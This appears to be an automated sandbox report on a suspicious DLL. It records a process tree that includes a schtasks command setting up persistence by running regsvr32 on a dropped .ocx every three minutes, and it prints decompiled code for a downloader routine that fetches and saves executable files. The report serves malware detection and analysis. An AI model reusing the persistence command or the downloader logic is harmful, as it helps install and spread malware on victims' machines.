2022-01-30 12:33:36 UTC	1511	IN	Data Raw: 57 66 62 66 74 67 4e 37 33 47 58 66 63 67 2f 30 44 2f 59 50 2b 6f 2f 36 44 2f 2f 50 2f 67 2f 62 61 68 31 51 55 51 7a 56 30 35 58 63 67 67 77 45 44 41 59 4d 43 6f 77 4b 44 41 2f 4d 44 67 77 0d 0a 4c 57 67 37 63 54 67 43 44 33 34 33 63 6d 67 77 63 44 42 34 4d 49 6f 77 69 44 43 66 4d 4a 67 77 7a 57 6a 62 63 64 67 43 37 33 36 58 63 73 67 77 30 44 44 59 4d 4f 6f 77 36 44 44 2f 4d 50 67 77 0d 0a 62 57 6c 37 63 48 67 44 54 33 39 33 63 79 67 78 4d 44 45 34 4d 55 6f 78 53 44 46 66 4d 56 67 78 44 57 6b 62 63 42 67 44 4c 33 2f 58 63 34 67 78 6b 44 47 59 4d 61 6f 78 71 44 47 2f 4d 62 67 78 0d 0a 72 57 6d 37 63 4c 67 44 6a 33 2b 33 63 2b 67 78 38 44 48 34 4d 51 6f 79 43 44 49 66 4d 68 67 79 54 57 70 62 63 31 67 41 62 33 77 58 63 45 67 79 55 44 4a 59 4d 6d 6f 79 61 44 Data Ascii: WfbftgN73GXfcg/0D/YP+o/6D//P/g/bah1QUQzV05XcggwEDAYMCowKDA/MDgwLWg7cTgCD343cmgwcDB4MIowiDCfMJgwzWjbcdgC736Xcsgw0DDYMOow6DD/MPgwbWl7cHgDT393cygxMDE4MUoxSDFfMVgxDWkbcBgDL3/Xc4gxkDGYMaoxqDG/MbgxrWm7cLgDj3+3c+gx8DH4MQoyCDIfMhgyTWpbc1gAb3wXcEgyUDJYMmoyaD

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 6120, Parent PID: 3660

General

Target ID:	0
Start time:	13:29:58
Start date:	30/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Imagebase:	0xf30000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 4764, Parent PID: 6120

General

Target ID:	1
Start time:	13:29:59
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 3576, Parent PID: 6120

General

Target ID:	2
Start time:	13:29:59
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Imagebase:	0x960000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6212, Parent PID: 4764

General

Target ID:	3
Start time:	13:29:59
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6256, Parent PID: 6120

General

Target ID:	4
Start time:	13:29:59
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6760, Parent PID: 6120

General

Target ID:	10
Start time:	13:30:02
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5388, Parent PID: 6120

General

Target ID:	14
Start time:	13:30:06
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 4532, Parent PID: 3576

General

Target ID:	18
Start time:	13:30:34
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:	0x13c0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 5808, Parent PID: 664

General

Target ID:	20
Start time:	13:30:37
Start date:	30/01/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:	0x7ff698e60000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6460, Parent PID: 5808

General

Target ID:	21
Start time:	13:30:38
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e C:\ProgramData\6\5507.ocx
Imagebase:	0x960000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 6348, Parent PID: 3576

General

Target ID:	27
Start time:	13:30:50
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 2064
Imagebase:	0x990000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 1264, Parent PID: 664

General

Target ID:	37
Start time:	13:33:02
Start date:	30/01/2022
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Imagebase:	0x7ff698e60000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 2016, Parent PID: 1264

General

Target ID:	38
Start time:	13:33:02
Start date:	30/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-e C:\ProgramData\6\5507.ocx
Imagebase:	0x960000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 3576, Parent PID: 6120COMMON

Execution Graph

Execution Coverage:	12%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	1520
Total number of Limit Nodes:	14

Executed Functions

Function 6E9E8210 Relevance: 7.6, APIs: 5, Instructions: 144
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			E6E9E8210(char* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				void* _v16;
				struct _OVERLAPPED* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v52;
				long _v56;
				long _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				long _v72;
				void* _t53;
				void* _t57;

				_v20 = 0;
				_v28 = E6E9E2400(0, 0);
				_v32 = _v28(_a4, 1, 0);
				if(_v32 != 0) {
					_v36 = E6E9E2610(0, 0);
					_v16 = _v36(0, 0, 0, 0, 0);
					_t53 = E6E9E17B0(_a8, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					_v8 = _t53;
					_v40 = E6E9E26A0(0, 0);
					_v24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0x84000000, 0);
					if(_v24 != 0) {
						while(1) {
							_t57 = E6E9E1910(0, 0x100000, 0x3000, 4); // executed
							_v12 = _t57;
							_v48 = E6E9E24F0(0, 0);
							if(InternetReadFile(_v24, _v12, 0x100000,  &_v56) == 0) {
								break;
							}
							_v52 = _v12;
							if(( *_v52 & 0x0000ffff) == 0x5a4d) {
								_v64 = E6E9E2490(0, 0);
								_v60 = _v56;
								WriteFile(_v8, _v12, _v60,  &_v72, 0);
								_v20 =  &(_v20->Internal);
								if(1 != 0) {
									continue;
								}
								L9:
								E6E9E1760(_v8);
								_v68 = E6E9E23A0(0, 0);
								InternetCloseHandle(_v16);
								E6E9E1960(_v12, 0, 0x8000); // executed
								if(_v20 != 0) {
									return 1;
								}
								return 0;
							}
							goto L9;
						}
						E6E9E1760(_v8);
						return 0;
					}
					E6E9E1760(_v8);
					_v44 = E6E9E23A0(0, 0);
					_v44(_v16);
					return 0;
				}
				return 0;
			}

0x6e9e8216
0x6e9e8226
0x6e9e8234
0x6e9e823b
0x6e9e824d
0x6e9e825d
0x6e9e8276
0x6e9e827b
0x6e9e8287
0x6e9e82a0
0x6e9e82a7
0x6e9e82cc
0x6e9e82da
0x6e9e82df
0x6e9e82eb
0x6e9e8304
0x00000000
0x00000000
0x6e9e8319
0x6e9e8327
0x6e9e8336
0x6e9e833c
0x6e9e8351
0x6e9e835a
0x6e9e8364
0x00000000
0x00000000
0x6e9e836a
0x6e9e836e
0x6e9e837c
0x6e9e8383
0x6e9e8391
0x6e9e839a
0x00000000
0x6e9e83a0
0x00000000
0x6e9e839c
0x00000000
0x6e9e8329
0x6e9e830a
0x00000000
0x6e9e830f
0x6e9e82ad
0x6e9e82bb
0x6e9e82c2
0x00000000
0x6e9e82c5
0x00000000

APIs

InternetCheckConnectionA.WININET(?,00000001,00000000,00000000,00000000), ref: 6E9E8231
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000,00000000,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 6E9E829D

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: Internet$CheckConnectionOpen
String ID:
API String ID: 2967963609-0
Opcode ID: 87d2ecc2a921718bd2409e37d0c74111003fcbfcd807252781c794f132c2f2d4
Instruction ID: 0ba2b3a986dc3f784bab7f8129c3519c07479f21050774620367033d1cb1b194
Opcode Fuzzy Hash: 87d2ecc2a921718bd2409e37d0c74111003fcbfcd807252781c794f132c2f2d4
Instruction Fuzzy Hash: 1851F8B4E44209BBEB55DBE4CC45FEEB6B8AF48B04F104919F705BA6C0D7B1A9408F64

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E93FD Relevance: 10.6, APIs: 7, Instructions: 136
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E6E9E93FD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t42;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6e9fa5f0);
				E6E9E9960(__ebx, __edi, __esi);
				_t34 =  *0x6e9fcfec; // 0x0
				if(_t34 > 0) {
					 *0x6e9fcfec = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E9E8E91();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6e9fcfc8 - 2;
					if( *0x6e9fcfc8 != 2) {
						E6E9E9839(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6e9fa618);
						E6E9E9960(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6E9E92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_push(_t72);
									_push( *((intOrPtr*)(_t82 + 8)));
									_t42 = E6E9E9A40();
									_t76 = _t42;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_push(_t42);
											_push( *((intOrPtr*)(_t82 + 8)));
											_t45 = E6E9E9A40();
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E9E93FD(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E9E92A3(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E9E95B8( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e9fcfec - _t72; // 0x0
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E9E8F5C(__ebx, _t61, 1, __esi);
						E6E9E9A52();
						E6E9E9AB3();
						 *0x6e9fcfc8 =  *0x6e9fcfc8 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E9E9492();
						_t54 = E6E9E90FE( *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E9E949F();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6e9e93fd
0x6e9e93fd
0x6e9e93ff
0x6e9e9404
0x6e9e9409
0x6e9e9410
0x6e9e9417
0x6e9e941f
0x6e9e9422
0x6e9e942b
0x6e9e942e
0x6e9e9431
0x6e9e9438
0x6e9e94a7
0x6e9e94ac
0x6e9e94ad
0x6e9e94af
0x6e9e94b4
0x6e9e94b9
0x6e9e94bc
0x6e9e94be
0x6e9e94cf
0x6e9e94cf
0x6e9e94d3
0x6e9e94d6
0x6e9e94e2
0x6e9e94e2
0x6e9e94ef
0x6e9e94f1
0x6e9e94f4
0x6e9e94f6
0x6e9e9501
0x6e9e9506
0x6e9e9508
0x6e9e950b
0x6e9e950d
0x00000000
0x00000000
0x6e9e950d
0x6e9e94d8
0x6e9e94d8
0x6e9e94db
0x00000000
0x6e9e94dd
0x6e9e94dd
0x6e9e9513
0x6e9e9513
0x6e9e9514
0x6e9e9515
0x6e9e9518
0x6e9e951d
0x6e9e951f
0x6e9e9522
0x6e9e9525
0x6e9e9527
0x6e9e9529
0x6e9e952b
0x6e9e952c
0x6e9e952d
0x6e9e9530
0x6e9e9535
0x6e9e9537
0x6e9e9537
0x6e9e953d
0x6e9e953e
0x6e9e9543
0x6e9e9549
0x6e9e9549
0x6e9e9529
0x6e9e954e
0x6e9e9550
0x6e9e9557
0x6e9e9561
0x6e9e9563
0x6e9e9566
0x6e9e9568
0x6e9e9574
0x6e9e959c
0x6e9e959c
0x6e9e9552
0x6e9e9552
0x6e9e9555
0x00000000
0x00000000
0x6e9e9555
0x6e9e9550
0x6e9e94db
0x6e9e959f
0x6e9e95a6
0x6e9e94c0
0x6e9e94c0
0x6e9e94c6
0x00000000
0x6e9e94c8
0x6e9e94c8
0x6e9e94c8
0x6e9e94c6
0x6e9e95ab
0x6e9e95b7
0x6e9e943a
0x6e9e943a
0x6e9e943f
0x6e9e9444
0x6e9e9449
0x6e9e9450
0x6e9e9454
0x6e9e945e
0x6e9e946a
0x6e9e946c
0x6e9e946c
0x6e9e946e
0x6e9e9471
0x6e9e9478
0x6e9e947d
0x00000000
0x6e9e947d
0x6e9e9412
0x6e9e9412
0x6e9e947f
0x6e9e9482
0x6e9e948e
0x6e9e948e

APIs

__RTC_Initialize.LIBCMT ref: 6E9E9444
___scrt_uninitialize_crt.LIBCMT ref: 6E9E945E

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 4d6da4f1d8af177ea3b73f4e339ee4b827ce6018f87e5cb3b28d19ac9abb5964
Instruction ID: f55bb1c7a68a81c4745f9035bd0c5f849aad8c644ee7d5be5b110934d8f437c0
Opcode Fuzzy Hash: 4d6da4f1d8af177ea3b73f4e339ee4b827ce6018f87e5cb3b28d19ac9abb5964
Instruction Fuzzy Hash: EA41D172E04665AFDB128FE9C800BDE7A7CEF95754F004899EE156BA40DB70CE418F90

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E94AD Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E6E9E94AD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t24;
				signed int _t25;
				signed int _t26;
				signed int _t29;
				signed int _t35;
				void* _t37;
				void* _t40;
				signed int _t42;
				signed int _t45;
				void* _t47;
				void* _t52;

				_t40 = __edx;
				_push(0xc);
				_push(0x6e9fa618);
				E6E9E9960(__ebx, __edi, __esi);
				_t42 =  *(_t47 + 0xc);
				if(_t42 != 0) {
					L3:
					 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
					__eflags = _t42 - 1;
					if(_t42 == 1) {
						L6:
						_t35 =  *(_t47 + 0x10);
						_t45 = E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							L16:
							 *(_t47 - 4) = 0xfffffffe;
							_t24 = _t45;
							L17:
							 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0x10));
							return _t24;
						}
						_t25 = E6E9E92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35); // executed
						_t45 = _t25;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t45;
						if(_t45 == 0) {
							goto L16;
						}
						L8:
						_push(_t35);
						_push(_t42);
						_push( *((intOrPtr*)(_t47 + 8)));
						_t26 = E6E9E9A40();
						_t45 = _t26;
						 *(_t47 - 0x1c) = _t45;
						__eflags = _t42 - 1;
						if(_t42 == 1) {
							__eflags = _t45;
							if(_t45 == 0) {
								_push(_t35);
								_push(_t26);
								_push( *((intOrPtr*)(_t47 + 8)));
								_t29 = E6E9E9A40();
								__eflags = _t35;
								_t14 = _t35 != 0;
								__eflags = _t14;
								_push((_t29 & 0xffffff00 | _t14) & 0x000000ff);
								E6E9E93FD(_t35, _t40, _t42, _t45, _t14);
								_pop(_t37);
								E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t45, _t35);
							}
						}
						__eflags = _t42;
						if(_t42 == 0) {
							L13:
							_t45 = E6E9E92A3(_t35, _t37, _t40, _t42, _t45,  *((intOrPtr*)(_t47 + 8)), _t42, _t35);
							 *(_t47 - 0x1c) = _t45;
							__eflags = _t45;
							if(_t45 != 0) {
								_t45 = E6E9E95B8( *((intOrPtr*)(_t47 + 8)), _t42, _t35);
								 *(_t47 - 0x1c) = _t45;
							}
							goto L16;
						} else {
							__eflags = _t42 - 3;
							if(_t42 != 3) {
								goto L16;
							}
							goto L13;
						}
					}
					__eflags = _t42 - 2;
					if(_t42 == 2) {
						goto L6;
					}
					_t35 =  *(_t47 + 0x10);
					goto L8;
				}
				_t52 =  *0x6e9fcfec - _t42; // 0x0
				if(_t52 > 0) {
					goto L3;
				}
				_t24 = 0;
				goto L17;
			}

0x6e9e94ad
0x6e9e94ad
0x6e9e94af
0x6e9e94b4
0x6e9e94b9
0x6e9e94be
0x6e9e94cf
0x6e9e94cf
0x6e9e94d3
0x6e9e94d6
0x6e9e94e2
0x6e9e94e2
0x6e9e94ef
0x6e9e94f1
0x6e9e94f4
0x6e9e94f6
0x6e9e959f
0x6e9e959f
0x6e9e95a6
0x6e9e95a8
0x6e9e95ab
0x6e9e95b7
0x6e9e95b7
0x6e9e9501
0x6e9e9506
0x6e9e9508
0x6e9e950b
0x6e9e950d
0x00000000
0x00000000
0x6e9e9513
0x6e9e9513
0x6e9e9514
0x6e9e9515
0x6e9e9518
0x6e9e951d
0x6e9e951f
0x6e9e9522
0x6e9e9525
0x6e9e9527
0x6e9e9529
0x6e9e952b
0x6e9e952c
0x6e9e952d
0x6e9e9530
0x6e9e9535
0x6e9e9537
0x6e9e9537
0x6e9e953d
0x6e9e953e
0x6e9e9543
0x6e9e9549
0x6e9e9549
0x6e9e9529
0x6e9e954e
0x6e9e9550
0x6e9e9557
0x6e9e9561
0x6e9e9563
0x6e9e9566
0x6e9e9568
0x6e9e9574
0x6e9e959c
0x6e9e959c
0x00000000
0x6e9e9552
0x6e9e9552
0x6e9e9555
0x00000000
0x00000000
0x00000000
0x6e9e9555
0x6e9e9550
0x6e9e94d8
0x6e9e94db
0x00000000
0x00000000
0x6e9e94dd
0x00000000
0x6e9e94dd
0x6e9e94c0
0x6e9e94c6
0x00000000
0x00000000
0x6e9e94c8
0x00000000

APIs

dllmain_raw.LIBCMT ref: 6E9E94EA
dllmain_crt_dispatch.LIBCMT ref: 6E9E9501
dllmain_raw.LIBCMT ref: 6E9E9549
dllmain_crt_dispatch.LIBCMT ref: 6E9E955C
dllmain_raw.LIBCMT ref: 6E9E956F

Memory Dump Source

Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: f3bdd62b9eaf44bc6e5136fd12c9be93b17f52c126be5672da99562bac2fed98
Instruction ID: 01b17f800f3c0edc663631ca35febe808a74f3f7f1fe833cd5ba9e9c74a318d0
Opcode Fuzzy Hash: f3bdd62b9eaf44bc6e5136fd12c9be93b17f52c126be5672da99562bac2fed98
Instruction Fuzzy Hash: 8F219172D04625AFDB634FD9CC40AAE3A6DEF85A94F014495FE286B610DB30CD418FD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E5D90 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 193
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E6E9E5D90(void* __eflags) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				CHAR* _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _t86;

				_v5 = 0;
				_t86 = E6E9E2640(L"KERNEL32.dll", 0); // executed
				_v24 = _t86;
				_v20 = E6E9E3C50(E6E9E4F10( &_v5));
				_v28 = _v24(_v20);
				if(_v28 == 0) {
					_v6 = 0;
					_v36 = E6E9E2430(L"KERNEL32.dll", 0);
					_v32 = E6E9E3BF0(E6E9E3DF0( &_v6));
					_v36(_v32);
				}
				_v7 = 0;
				_v44 = E6E9E2640(L"KERNEL32.dll", 0);
				_v40 = E6E9E3C90(E6E9E4120( &_v7));
				_v48 = _v44(_v40);
				if(_v48 == 0) {
					_v8 = 0;
					_v56 = E6E9E2430(L"KERNEL32.dll", 0);
					_v52 = E6E9E3CD0(E6E9E5090( &_v8));
					_v56(_v52);
				}
				_v9 = 0;
				_v64 = E6E9E2640(L"KERNEL32.dll", 0);
				_v60 = E6E9E3B10(E6E9E4E00( &_v9));
				_v68 = _v64(_v60);
				if(_v68 == 0) {
					_v10 = 0;
					_v76 = E6E9E2430(L"KERNEL32.dll", 0);
					_v72 = E6E9E3B30(E6E9E43F0( &_v10));
					LoadLibraryA(_v72);
				}
				_v11 = 0;
				_v84 = E6E9E2640(L"KERNEL32.dll", 0);
				_v80 = E6E9E3BD0(E6E9E4F90( &_v11));
				_v88 = _v84(_v80);
				if(_v88 == 0) {
					_v12 = 0;
					_v96 = E6E9E2430(L"KERNEL32.dll", 0);
					_v92 = E6E9E3C10(E6E9E4A40( &_v12));
					LoadLibraryA(_v92);
				}
				_v13 = 0;
